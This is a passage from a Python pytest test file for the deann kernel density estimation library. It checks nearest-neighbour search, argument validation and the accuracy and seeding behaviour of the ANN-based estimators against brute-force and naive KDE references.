            q = Y[idx,:]
            res = bnn.query(q,k)
            assert isinstance(res,tuple)
            assert len(res) == 3
            (dists, nns, samples) = res
            assert isinstance(dists,np.ndarray)
            assert isinstance(nns,np.ndarray)
            assert isinstance(samples,np.ndarray)
            assert dists.ndim == 2
            # Taxicab distances are expected in float64 regardless of
            # the input dtype; euclidean follows the input dtype.
            if metric == 'euclidean':
                assert dists.dtype == dt
            else:
                assert dists.dtype == np.float64
            assert dists.shape[0] == 1
            assert dists.shape[1] == k
            # Distances must be strictly increasing.
            for i in range(1,k):
                assert dists[0,i-1] < dists[0,i]
            assert nns.ndim == 2
            assert nns.dtype == np.int64
            assert nns.shape[0] == 1
            assert nns.shape[1] == k
            assert np.all((nns >= 0) & (nns < n))
            # Each reported distance must match a direct norm computation.
            for i in range(k):
                x = X[nns[0,i],:]
                assert np.abs(np.linalg.norm(x-q, ord = (2 if metric == 'euclidean' else 1)) - dists[0,i]) < DELTA
            # Brute force always scans the full dataset.
            assert samples.ndim == 1
            assert samples.shape[0] == 1
            assert samples.dtype == np.int32
            assert samples[0] == n
            # Flags (dists=True, samples=False): (distances, neighbors).
            bnn = BruteNN(metric, True, False)
            bnn.fit(X)
            res = bnn.query(q,k)
            assert isinstance(res,tuple)
            assert len(res) == 2
            (dists2, nns2) = res
            assert isinstance(dists2,np.ndarray)
            assert isinstance(nns2,np.ndarray)
            assert np.array_equal(dists, dists2)
            assert np.array_equal(nns, nns2)
            # Flags (dists=False, samples=True): (neighbors, samples).
            bnn = BruteNN(metric, False, True)
            bnn.fit(X)
            res = bnn.query(q,k)
            assert isinstance(res,tuple)
            assert len(res) == 2
            (nns3, samples3) = res
            assert isinstance(nns3,np.ndarray)
            assert isinstance(samples3,np.ndarray)
            assert np.array_equal(nns, nns3)
            assert samples3.ndim == samples.ndim
            assert samples3.dtype == samples.dtype
            assert np.array_equal(samples, samples3)
            # Flags (False, False): a bare neighbor-index array.
            bnn = BruteNN(metric, False, False)
            bnn.fit(X)
            res = bnn.query(q,k)
            assert isinstance(res,np.ndarray)
            nns4 = res
            assert np.array_equal(nns, nns4)
def test_linear_scan():
    """LinearScan argument validation and agreement with the BruteNN
    reference for both metrics, dtypes, and several values of k.

    Bug fixes vs. the original:
    * The final per-neighbor validation loop iterated
      range(nn_bnn.shape[0]), which is always 1 since the result shape
      is (1, k) — so only the single nearest neighbor was ever checked.
      It now iterates all k neighbors (shape[1]).
    * The inner loops shadowed the outer query index `i`; they now use
      a separate index `j`.
    * Index equality between BruteNN and LinearScan is only asserted
      when the indices match; differing indices are tolerated for
      float32 near-ties with (numerically) equal distances, consistent
      with the pre-existing mismatch-tolerance branch.
    """
    # --- argument validation ---
    with pytest.raises(ValueError):
        deann.LinearScan('eclidean')
    with pytest.raises(ValueError):
        deann.LinearScan('euclidean').fit(np.ones(9))
    with pytest.raises(ValueError):
        deann.LinearScan('euclidean').fit(np.ones((10,9), dtype=np.int64))
    with pytest.raises(ValueError):
        deann.LinearScan('euclidean').fit(np.ones((0,9), dtype=np.float64))
    with pytest.raises(ValueError):
        deann.LinearScan('euclidean').fit(np.ones((10,0), dtype=np.float32))
    with pytest.raises(ValueError):
        ls = deann.LinearScan('euclidean')
        ls.query(np.ones((2,9), dtype=np.float64), 1)
    with pytest.raises(ValueError):
        ls = deann.LinearScan('euclidean')
        ls.fit(np.ones((10,9), dtype=np.float32))
        ls.query(np.ones((2,9), dtype=np.float32), 0)
    with pytest.raises(ValueError):
        ls = deann.LinearScan('euclidean')
        ls.fit(np.ones((10,9), dtype=np.float32))
        ls.query(np.ones((2,9), dtype=np.float32), -1)
    with pytest.raises(ValueError):
        ls = deann.LinearScan('euclidean')
        ls.fit(np.ones((10,9), dtype=np.float32))
        ls.query(np.ones((2,9), dtype=np.float64), 1)
    with pytest.raises(ValueError):
        ls = deann.LinearScan('euclidean')
        ls.fit(np.ones((10,9), dtype=np.float64))
        ls.query(np.ones((2,9), dtype=np.float32), 1)
    with pytest.raises(ValueError):
        ls = deann.LinearScan('euclidean')
        ls.fit(np.ones((10,9), dtype=np.float64))
        ls.query(np.ones((0,9), dtype=np.float64), 1)
    with pytest.raises(ValueError):
        ls = deann.LinearScan('euclidean')
        ls.fit(np.ones((10,9), dtype=np.float64))
        ls.query(np.ones((2,0), dtype=np.float64), 1)
    # --- agreement with the BruteNN reference ---
    for dt in [np.float64, np.float32]:
        X, Y = construct_test_set()
        X = X.astype(dt)
        Y = Y.astype(dt)
        if dt == np.float64:
            DELTA = 1e-12
        else:
            DELTA = 1e-3
        for metric in ['euclidean', 'taxicab']:
            bnn = BruteNN(metric)
            bnn.fit(X)
            ls = deann.LinearScan(metric)
            ls.fit(X)
            for k in [1, 101, X.shape[0]]:
                for i in range(Y.shape[0]):
                    q = Y[i,:]
                    (dists_bnn, nn_bnn, samples_bnn) = bnn.query(q,k)
                    # Taxicab distances come back as float64 regardless
                    # of the input dtype; euclidean follows the dtype.
                    if metric == 'euclidean':
                        assert dists_bnn.dtype == dt
                    else:
                        assert dists_bnn.dtype == np.float64
                    assert dists_bnn.ndim == 2
                    assert dists_bnn.shape == (1,k)
                    assert nn_bnn.dtype == np.int64
                    assert nn_bnn.ndim == 2
                    assert nn_bnn.shape == (1,k)
                    assert samples_bnn.ndim == 1
                    assert samples_bnn.shape[0] == 1
                    assert samples_bnn[0] == X.shape[0]
                    assert samples_bnn.dtype == np.int32
                    (dists_ls, nn_ls, samples_ls) = ls.query(q,k)
                    assert nn_ls.dtype == np.int32
                    assert nn_ls.ndim == 2
                    assert nn_ls.shape == (1,k)
                    assert dists_ls.dtype == dt
                    assert dists_ls.ndim == 2
                    assert dists_ls.shape == (1,k)
                    assert samples_ls.ndim == 1
                    assert samples_ls.shape[0] == 1
                    assert samples_ls[0] == X.shape[0]
                    assert samples_ls.dtype == np.int32
                    # Validate every reported neighbor (was: only the
                    # first one, via range(nn_bnn.shape[0]) == range(1)).
                    for j in range(nn_bnn.shape[1]):
                        idx = nn_bnn[0,j]
                        x = X[idx,:]
                        nrm = 1 if metric == 'taxicab' else 2
                        dist = np.linalg.norm(x-q, ord = nrm)
                        assert abs(dists_bnn[0,j] - dist) < DELTA
                        idx_ls = nn_ls[0,j]
                        if idx == idx_ls:
                            assert abs(dists_ls[0,j] - dist) < DELTA
                        else:
                            # Differing indices are only tolerated for
                            # float32 near-ties with equal distances.
                            assert dt == np.float32
                            dist_ls = np.linalg.norm(X[idx_ls,:]-q, ord = nrm)
                            assert np.abs(dist - dist_ls) < 1e-3
            # Requesting more neighbors than data points must fail.
            k = 2*X.shape[0]+1
            q = Y[0,:]
            with pytest.raises(ValueError):
                nn_bnn = bnn.query(q,k)
            with pytest.raises(ValueError):
                nn_ls = ls.query(q,k)
class AnnObjectInvalid:
    """Stand-in ANN object exposing no query() method at all; used to
    check that AnnEstimator rejects objects lacking the expected
    interface."""
class AnnObjectInvalidType:
    """Fake ANN object whose query() returns deliberately malformed
    results (wrong container shape and/or wrong dtypes), used to check
    AnnEstimator's result validation."""
    def __init__(self, as_ndarray = True, as_tuple = True,
                 nn_type = np.int64, dist_type = np.float64):
        # Record the requested result flavor and dtypes.
        self._as_ndarray = as_ndarray
        self._as_tuple = as_tuple
        self._nn_type = nn_type
        self._dist_type = dist_type
    def query(self, q, k):
        """Return a bogus result of length k in the configured flavor."""
        if not self._as_tuple:
            # Non-tuple flavors: a lone index array, or nothing at all.
            if self._as_ndarray:
                return -np.ones(k, dtype=self._nn_type)
            return None
        fake_dists = -np.ones(k, dtype=self._dist_type)
        fake_nns = -np.ones(k, dtype=self._nn_type)
        return (fake_dists, fake_nns)
class AnnObject:
    """Counting wrapper around an ANN backend: forwards query() to the
    wrapped object while recording how many times it was invoked."""
    def __init__(self, ann = None):
        # Number of times query() has been called on this wrapper.
        self.num_of_calls = 0
        self._ann = ann
    def query(self, q, k):
        """Delegate the query to the wrapped backend, counting the call."""
        self.num_of_calls += 1
        backend = self._ann
        return backend.query(q, k)
def test_ann_estimator1():
    """AnnEstimator argument validation, rejection of malformed ANN
    backends, and accuracy: k nearest neighbors alone, random samples
    alone, and the combination (which must beat either alone).
    """
    # --- constructor / fit / query argument validation ---
    with pytest.raises(ValueError):
        deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObjectInvalid())
    with pytest.raises(ValueError):
        deann.AnnEstimator(0.0, 'exponential', 0, 0, AnnObject())
    with pytest.raises(ValueError):
        deann.AnnEstimator(-0.0, 'exponential', 0, 0, AnnObject())
    with pytest.raises(ValueError):
        deann.AnnEstimator(1.0, 'eXponential', 0, 0, AnnObject())
    with pytest.raises(ValueError):
        deann.AnnEstimator(1.0, 'exponential', -1, 0, AnnObject())
    with pytest.raises(ValueError):
        deann.AnnEstimator(1.0, 'exponential', 0, -1, AnnObject())
    with pytest.raises(ValueError):
        deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject()).fit(np.ones(9,dtype=np.float64))
    with pytest.raises(ValueError):
        deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject()).fit(np.ones((10,9),dtype=np.int64))
    with pytest.raises(ValueError):
        deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject()).fit(np.ones((0,9),dtype=np.float32))
    with pytest.raises(ValueError):
        deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject()).fit(np.ones((10,0),dtype=np.float32))
    with pytest.raises(ValueError):
        deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject()).query(np.ones((2,9),dtype=np.float64))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float64))
        ann_estimator.query(np.ones((2,9),dtype=np.int64))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float64))
        ann_estimator.query(np.ones((2,9),dtype=np.float32))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.query(np.ones((2,9),dtype=np.float64))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.query(np.ones((2,9,1),dtype=np.float32))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.query(np.ones((0,9),dtype=np.float32))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.query(np.ones((2,0),dtype=np.float32))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimator(1.0, 'exponential', 0, 0, AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.query(np.ones(0,dtype=np.float32))
    # Malformed backend results: wrong container / wrong dtypes.
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimator(1.0, 'exponential', 1, 0,
                                           AnnObjectInvalidType(False, False))
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.query(np.ones(9,dtype=np.float32))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimator(1.0, 'exponential', 1, 0,
                                           AnnObjectInvalidType(True, False, np.float32))
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.query(np.ones(9,dtype=np.float32))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimator(1.0, 'exponential', 1, 0,
                                           AnnObjectInvalidType(True, True, np.float32))
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.query(np.ones(9,dtype=np.float32))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimator(1.0, 'exponential', 1, 0,
                                           AnnObjectInvalidType(True, True, np.int32, np.int32))
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.query(np.ones(9,dtype=np.float32))
    # --- accuracy checks ---
    random_seed = 11992288
    rng = np.random.default_rng()
    NITERS = 100
    # Absolute/relative tolerances per dtype.
    DELTA64 = 1e-16
    EPSILON64 = 1e-13
    DELTA32 = 1e-10
    EPSILON32 = 1e-5
    for dt in [np.float64, np.float32]:
        X, Y = construct_test_set()
        X = X.astype(dt)
        Y = Y.astype(dt)
        h = 21.0
        for kernel in ['exponential', 'gaussian', 'laplacian']:
            # The laplacian kernel pairs with the taxicab metric.
            metric = 'taxicab' if kernel == 'laplacian' else 'euclidean'
            bnn = BruteNN(metric)
            bnn.fit(X)
            # k == 0 and m == 0: the estimate is identically zero and
            # no samples are evaluated.
            ann_estimator = deann.AnnEstimator(h, kernel, 0, 0, AnnObject())
            ann_estimator.fit(X)
            (Z,S) = ann_estimator.query(Y)
            assert np.all(Z == 0)
            assert np.all(S == 0)
            # k == 1, m == 0: single-query path; the estimate must equal
            # the kernel value of the exact nearest neighbor / n.
            ann_object = AnnObject(bnn)
            ann_estimator = deann.AnnEstimator(h, kernel, 1, 0, ann_object)
            ann_estimator.fit(X)
            j = 0
            for i in rng.choice(Y.shape[0], NITERS, replace = False):
                j += 1
                q = Y[i,:]
                (Z,S) = ann_estimator.query(q)
                # Exactly one backend call per query.
                assert ann_object.num_of_calls == j
                nn_idx = find_nearest_neighbor(q,X,metric)
                x = X[nn_idx,:]
                dist = np.linalg.norm(q-x, ord = (1 if metric == 'taxicab' else 2))
                mu = np.exp(-dist*dist/h/h/2) if kernel == 'gaussian' else np.exp(-dist/h)
                mu /= X.shape[0]
                assert Z.ndim == 1 and Z.shape[0] == 1
                assert Z[0] > 0
                assert mu > 0
                if dt == np.float64:
                    assert np.abs(Z-mu) < DELTA64
                    assert np.abs(Z-mu)/mu < EPSILON64
                elif dt == np.float32:
                    assert np.abs(Z-mu) < DELTA32
                    assert np.abs(Z-mu)/mu < EPSILON32
                assert S.ndim == 1 and S.shape[0] == 1
                assert S.dtype == np.int32
                assert S[0] == X.shape[0]
            # k == n, m == 0: the ANN part alone reproduces naive KDE.
            ann_object = AnnObject(bnn)
            ann_estimator = deann.AnnEstimator(h, kernel, X.shape[0], 0, ann_object)
            ann_estimator.fit(X)
            nkde = deann.NaiveKde(h, kernel)
            nkde.fit(X)
            start = time.time()
            (mu, S) = nkde.query(Y)
            end = time.time()
            print(f'nkde query took {end-start} s')
            start = time.time()
            (Z, S) = ann_estimator.query(Y)
            end = time.time()
            print(f'ann estimator query took {end-start} s')
            assert np.all(S == X.shape[0])
            assert ann_object.num_of_calls == Y.shape[0]
            if dt == np.float64:
                assert np.all(np.abs(mu-Z) < 1e-15)
            elif dt == np.float32:
                assert np.all(np.abs(mu-Z) < 1e-6)
            # k == 0: the estimator degenerates to RandomSampling with
            # the same seed and never calls the ANN backend.
            for m in [1, 101]:
                random_seed += m
                ann_object = AnnObject(bnn)
                ann_estimator = deann.AnnEstimator(h, kernel, 0, m,
                                                   ann_object, random_seed)
                ann_estimator.fit(X)
                rs = deann.RandomSampling(h, kernel, m, random_seed)
                rs.fit(X)
                (Z1, S1) = ann_estimator.query(Y)
                (Z2, S2) = rs.query(Y)
                assert ann_object.num_of_calls == 0
                if dt == np.float64:
                    assert np.all(np.abs(Z1-Z2) < 1e-15)
                elif dt == np.float32:
                    assert np.all(np.abs(Z1-Z2) < 1e-6)
                assert np.all(S1 == S2)
            # Combined k + m estimators: determinism per seed and
            # improved accuracy over either component alone.
            params = [(101,203)]
            avg_abs_err = np.zeros(len(params))
            avg_rel_err = np.zeros(len(params))
            i = 0
            for (k, m) in params:
                random_seed += k*m
                ann_object = AnnObject(bnn)
                # NN-only estimators are deterministic.
                ann_estimator1 = deann.AnnEstimator(h, kernel, k, 0,
                                                    ann_object)
                ann_estimator1.fit(X)
                (Z1, S1) = ann_estimator1.query(Y)
                assert ann_object.num_of_calls == Y.shape[0]
                assert np.all(S1 == X.shape[0])
                ann_estimator2 = deann.AnnEstimator(h, kernel, k, 0,
                                                    ann_object)
                ann_estimator2.fit(X)
                (Z2, S2) = ann_estimator2.query(Y)
                assert ann_object.num_of_calls == 2*Y.shape[0]
                assert np.array_equal(Z1,Z2)
                assert np.all(S2 == X.shape[0])
                # Sampling-only estimators without a seed differ.
                ann_estimator3 = deann.AnnEstimator(h, kernel, 0, m,
                                                    ann_object)
                ann_estimator3.fit(X)
                (Z3, S3) = ann_estimator3.query(Y)
                assert ann_object.num_of_calls == 2*Y.shape[0]
                assert np.all(S3 == m)
                ann_estimator4 = deann.AnnEstimator(h, kernel, 0, m,
                                                    ann_object)
                ann_estimator4.fit(X)
                (Z4, S4) = ann_estimator4.query(Y)
                assert ann_object.num_of_calls == 2*Y.shape[0]
                assert not np.array_equal(Z3,Z4)
                assert np.all(S4 == m)
                # Sampling-only estimators with equal seeds agree.
                ann_estimator5 = deann.AnnEstimator(h, kernel, 0, m,
                                                    ann_object, random_seed)
                ann_estimator5.fit(X)
                (Z5, S5) = ann_estimator5.query(Y)
                assert ann_object.num_of_calls == 2*Y.shape[0]
                assert np.all(S5 == m)
                ann_estimator6 = deann.AnnEstimator(h, kernel, 0, m,
                                                    ann_object, random_seed)
                ann_estimator6.fit(X)
                (Z6, S6) = ann_estimator6.query(Y)
                assert ann_object.num_of_calls == 2*Y.shape[0]
                assert np.array_equal(Z5,Z6)
                assert np.all(S6 == m)
                # Combined estimators with equal seeds agree too; the
                # sample count is m random samples plus a full NN scan.
                ann_estimator7 = deann.AnnEstimator(h, kernel, k, m,
                                                    ann_object, random_seed)
                ann_estimator7.fit(X)
                (Z7, S7) = ann_estimator7.query(Y)
                assert ann_object.num_of_calls == 3*Y.shape[0]
                assert np.all(S7 == m + X.shape[0])
                ann_estimator8 = deann.AnnEstimator(h, kernel, k, m,
                                                    ann_object, random_seed)
                ann_estimator8.fit(X)
                (Z8, S8) = ann_estimator8.query(Y)
                assert ann_object.num_of_calls == 4*Y.shape[0]
                assert np.array_equal(Z7,Z8)
                assert np.all(S8 == m + X.shape[0])
                # Combined must beat sampling-only and NN-only alone.
                abs_error = np.mean(np.abs(Z7-mu))
                assert abs_error < np.mean(np.abs(Z5-mu))
                assert abs_error < np.mean(np.abs(Z1-mu))
                rel_error = np.mean(np.abs((Z7-mu)/mu))
                assert rel_error < np.mean(np.abs((Z5-mu)/mu))
                assert rel_error < np.mean(np.abs((Z1-mu)/mu))
                avg_abs_err[i] = abs_error
                avg_rel_err[i] = rel_error
                i += 1
            assert avg_abs_err[-1] < 0.01
            assert avg_rel_err[-1] < 0.1
def test_ann_estimator2():
    """AnnEstimator seeding and parameter-reset semantics across all
    (k, m) combinations including the degenerate k == 0 / m == 0 cases.
    """
    h = 37.0
    seed = 527372036
    rng = np.random.default_rng()
    NITERS = 100
    for dt in [np.float32, np.float64]:
        X, Y = construct_test_set()
        X = X.astype(dt)
        Y = Y.astype(dt)
        # Subsample the queries to keep the runtime manageable.
        Y = Y[rng.choice(Y.shape[0], NITERS, replace = False),:]
        for kernel in ['exponential', 'gaussian', 'laplacian']:
            # The laplacian kernel pairs with the taxicab metric.
            metric = 'taxicab' if kernel == 'laplacian' else 'euclidean'
            bnn = BruteNN(metric)
            bnn.fit(X)
            for k in [0, 11]:
                for m in [0, 13]:
                    seed += 1
                    # Baseline run with an explicit seed.
                    ann1 = deann.AnnEstimator(h, kernel, k, m, bnn, seed)
                    ann1.fit(X)
                    (mu, S0) = ann1.query(Y)
                    if k == 0 and m == 0:
                        assert np.all(mu == 0)
                        assert np.all(S0 == 0)
                    else:
                        assert np.all(mu > 0)
                        # With k > 0 the NN component scans all points.
                        if k > 0:
                            assert np.all(S0 == X.shape[0] + m)
                        else:
                            assert np.all(S0 == m)
                    # Unseeded estimator differs exactly when sampling is
                    # involved (m > 0); reseeding restores the baseline.
                    ann2 = deann.AnnEstimator(h, kernel, k, m, bnn)
                    ann2.fit(X)
                    (Z, S1) = ann2.query(Y)
                    if m == 0:
                        assert np.array_equal(mu, Z)
                    else:
                        assert not np.array_equal(mu,Z)
                    assert np.array_equal(S0,S1)
                    ann2.reset_seed(seed)
                    (Z, S2) = ann2.query(Y)
                    assert np.array_equal(mu, Z)
                    assert np.array_equal(S0,S2)
                    # Different k: results differ; reset_parameters +
                    # reset_seed restore the baseline.
                    ann3 = deann.AnnEstimator(h, kernel, k+1, m, bnn, seed)
                    ann3.fit(X)
                    (Z, S3) = ann3.query(Y)
                    assert not np.array_equal(mu,Z)
                    assert np.all(S3 == X.shape[0] + m)
                    ann3.reset_parameters(k,m)
                    (Z, S4) = ann3.query(Y)
                    if m == 0:
                        assert np.array_equal(mu,Z)
                    else:
                        assert not np.array_equal(mu,Z)
                    assert np.array_equal(S0,S4)
                    ann3.reset_seed(seed)
                    (Z, S5) = ann3.query(Y)
                    assert np.array_equal(mu,Z)
                    assert np.array_equal(S0,S5)
                    # Different m: same pattern.
                    ann4 = deann.AnnEstimator(h, kernel, k, m+1, bnn, seed)
                    ann4.fit(X)
                    (Z, S6) = ann4.query(Y)
                    assert not np.array_equal(mu,Z)
                    assert np.array_equal(S0 + 1, S6)
                    ann4.reset_parameters(k,m)
                    (Z, S7) = ann4.query(Y)
                    if m == 0:
                        assert np.array_equal(mu,Z)
                    else:
                        assert not np.array_equal(mu,Z)
                    assert np.array_equal(S0,S7)
                    ann4.reset_seed(seed)
                    (Z, S8) = ann4.query(Y)
                    assert np.array_equal(mu,Z)
                    assert np.array_equal(S0,S8)
                    # Both k and m different: same pattern.
                    ann5 = deann.AnnEstimator(h, kernel, k+1, m+1, bnn, seed)
                    ann5.fit(X)
                    (Z, S9) = ann5.query(Y)
                    assert not np.array_equal(mu,Z)
                    assert np.all(S9 == X.shape[0] + m + 1)
                    ann5.reset_parameters(k,m)
                    (Z, S10) = ann5.query(Y)
                    if m == 0:
                        assert np.array_equal(mu,Z)
                    else:
                        assert not np.array_equal(mu,Z)
                    assert np.array_equal(S0,S10)
                    ann5.reset_seed(seed)
                    (Z, S11) = ann5.query(Y)
                    assert np.array_equal(mu,Z)
                    assert np.array_equal(S0,S11)
def test_ann_estimator3():
    """Check AnnEstimator consistency across two BruteNN configurations.

    bnn1 is constructed with (metric, True, True) and bnn2 with
    (metric, False, False); presumably these flags toggle whether the NN
    backend returns distances/sample counts — TODO confirm against the
    BruteNN definition elsewhere in this file.  The estimates produced with
    either backend must agree to within precision-dependent tolerances.
    """
    h = 24.0  # kernel bandwidth
    seed = 0x055c5b79  # base seed, incremented once per (kernel, k) combo
    # absolute (DELTA*) and relative (EPSILON*) tolerances per float precision
    DELTA64 = 1e-15
    EPSILON64 = 1e-13
    DELTA32 = 1e-6
    EPSILON32 = 1e-5
    rng = np.random.default_rng()  # unseeded: query subset varies per run
    NITERS = 100  # number of query points drawn from Y
    for dt in [np.float32, np.float64]:
        X, Y = construct_test_set()
        X = X.astype(dt)
        Y = Y.astype(dt)
        # keep only a random subset of the queries to bound the runtime
        Y = Y[rng.choice(Y.shape[0], NITERS, replace = False),:]
        # looser distance tolerance used for the raw NN-distance check below
        if dt == np.float32:
            DELTA = 1e-3
        else:
            DELTA = 1e-12
        for kernel in ['exponential', 'gaussian', 'laplacian']:
            # laplacian kernel pairs with the taxicab (L1) metric
            metric = 'taxicab' if kernel == 'laplacian' else 'euclidean'
            bnn1 = BruteNN(metric, True, True)
            bnn1.fit(X)
            bnn2 = BruteNN(metric, False, False)
            bnn2.fit(X)
            # k == X.shape[0] exercises the "all points are neighbors" edge case
            for k in [0, 103, X.shape[0]]:
                seed += 1
                if k > 0:
                    # raw NN query check: both backends must return the same
                    # neighbor indices, and bnn1's distances must match a
                    # recomputed norm to within DELTA
                    for j in range(Y.shape[0]):
                        q = Y[j,:]
                        dists, nns1, samples = bnn1.query(q,k)
                        nns2 = bnn2.query(q,k)
                        assert samples.ndim == 1 and samples.shape[0] == 1 and samples[0] == X.shape[0]
                        assert nns1.shape == nns2.shape
                        assert nns1.shape[0] == 1
                        assert np.array_equal(nns1, nns2)
                        for l in range(nns2.shape[1]):
                            idx = nns2[0,l]
                            x = X[idx,:]
                            dist = np.linalg.norm(x-q, ord = 1 if metric == 'taxicab' else 2)
                            assert abs(dists[0,l] - dist) < DELTA
                for m in [0, 123]:
                    ann1 = deann.AnnEstimator(h, kernel, k, m, bnn1, seed)
                    ann1.fit(X)
                    (mu, S) = ann1.query(Y)
                    if k == 0 and m == 0:
                        # degenerate estimator: no neighbors, no samples
                        assert np.all(mu == 0)
                        assert np.all(S == 0)
                    else:
                        assert np.all(mu > 0)
                    # expected sample counts: k >= n means a full scan (n),
                    # otherwise n + m random samples; k == 0 uses only m samples
                    if k > 0:
                        if k >= X.shape[0]:
                            assert np.all(S == X.shape[0])
                        else:
                            assert np.all(S == X.shape[0] + m)
                    else:
                        assert np.all(S == m)
                    ann2 = deann.AnnEstimator(h, kernel, k, m, bnn2, seed)
                    ann2.fit(X)
                    (Z, S) = ann2.query(Y)
                    assert mu.shape == Z.shape
                    assert S.shape == mu.shape
                    if k == 0:
                        # no NN component: both backends are bitwise identical
                        assert np.array_equal(Z,mu)
                        assert np.all(S == m)
                    else:
                        # with an NN component the two backends agree only up
                        # to floating-point tolerance
                        for i in range(mu.shape[0]):
                            if dt == np.float64:
                                assert np.abs(mu[i]-Z[i]) < DELTA64
                                assert np.abs(mu[i]-Z[i])/mu[i] < EPSILON64
                            else:
                                assert np.abs(mu[i]-Z[i]) < DELTA32
                                assert np.abs(mu[i]-Z[i])/mu[i] < EPSILON32
                        # NOTE(review): the third positional argument of
                        # np.allclose is rtol, so DELTA* is used as a relative
                        # tolerance here — confirm this is intended
                        assert np.allclose(mu, Z, DELTA64 if dt == np.float64 else DELTA32)
                        # NOTE(review): S == -1 presumably marks "sample count
                        # unavailable" for the (False, False) backend — confirm
                        assert np.all(S == -1)
def test_ann_faiss():
    """Sanity-check AnnEstimator backed by a FaissIVF index.

    For every dtype / k / n_list / n_probe combination the estimator must
    look at more than m but fewer than n points, and its mean absolute error
    against an exact NaiveKde evaluation must stay below 0.02.
    """
    m = 100
    h = 32.0
    seed = 112233  # kept for parity with the original; not consumed below
    rng = np.random.default_rng()
    NITERS = 100
    for dtype in [np.float32, np.float64]:
        X, Y = construct_test_set()
        X = X.astype(dtype)
        Y = Y.astype(dtype)
        subset = rng.choice(Y.shape[0], NITERS, replace = False)
        Y = Y[subset, :]
        # exact KDE values serve as the ground truth
        exact = deann.NaiveKde(h, 'exponential')
        exact.fit(X)
        mu, _ = exact.query(Y)
        for k in [5, 15]:
            for n_list in [16, 32]:
                index = FaissIVF('euclidean', n_list)
                estimator = deann.AnnEstimator(h, 'exponential', k, m, index)
                index.fit(X)
                estimator.fit(X)
                for n_probe in [5, 10]:
                    index.set_query_arguments(n_probe)
                    Z, S = estimator.query(Y)
                    # sample count must exceed the random-sample budget but
                    # stay strictly below a full scan
                    assert np.all(S > m)
                    assert np.all(S < X.shape[0])
                    assert np.mean(np.abs(mu - Z)) < 0.02
def test_ann_estimator_permuted1():
    """Validate AnnEstimatorPermuted end to end.

    First verifies that invalid constructor/fit/query/reset arguments raise
    ValueError, then checks the estimator's numerical behavior against
    NaiveKde (exact values) and RandomSamplingPermuted (pure sampling).

    NOTE(review): depends on project-local helpers (AnnObject*, BruteNN,
    construct_test_set, find_nearest_neighbor) defined elsewhere in this file.
    """
    # --- argument validation: each of these must raise ValueError ---
    with pytest.raises(ValueError):
        deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObjectInvalid())
    with pytest.raises(ValueError):
        deann.AnnEstimatorPermuted(0.0, 'exponential', 0, 0, AnnObject())
    with pytest.raises(ValueError):
        deann.AnnEstimatorPermuted(-0.0, 'exponential', 0, 0, AnnObject())
    with pytest.raises(ValueError):
        deann.AnnEstimatorPermuted(1.0, 'eXponential', 0, 0, AnnObject())
    with pytest.raises(ValueError):
        deann.AnnEstimatorPermuted(1.0, 'exponential', -1, 0, AnnObject())
    with pytest.raises(ValueError):
        deann.AnnEstimatorPermuted(1.0, 'exponential', 0, -1, AnnObject())
    # fit() rejects 1-D data, wrong dtypes, and empty dimensions
    with pytest.raises(ValueError):
        deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject()).fit(np.ones(9,dtype=np.float64))
    with pytest.raises(ValueError):
        deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject()).fit(np.ones((10,9),dtype=np.int64))
    with pytest.raises(ValueError):
        deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject()).fit(np.ones((0,9),dtype=np.float32))
    with pytest.raises(ValueError):
        deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject()).fit(np.ones((10,0),dtype=np.float32))
    # k, m, and k+m must not exceed the number of data points (10 here)
    with pytest.raises(ValueError):
        deann.AnnEstimatorPermuted(1.0, 'exponential', 100, 0, AnnObject()).fit(np.ones((10,9),dtype=np.float64))
    with pytest.raises(ValueError):
        deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 100, AnnObject()).fit(np.ones((10,9),dtype=np.float64))
    with pytest.raises(ValueError):
        deann.AnnEstimatorPermuted(1.0, 'exponential', 6, 6, AnnObject()).fit(np.ones((10,9),dtype=np.float64))
    # query() before fit() is an error
    with pytest.raises(ValueError):
        deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject()).query(np.ones((2,9),dtype=np.float64))
    # query dtype must match the fitted dtype exactly
    with pytest.raises(ValueError):
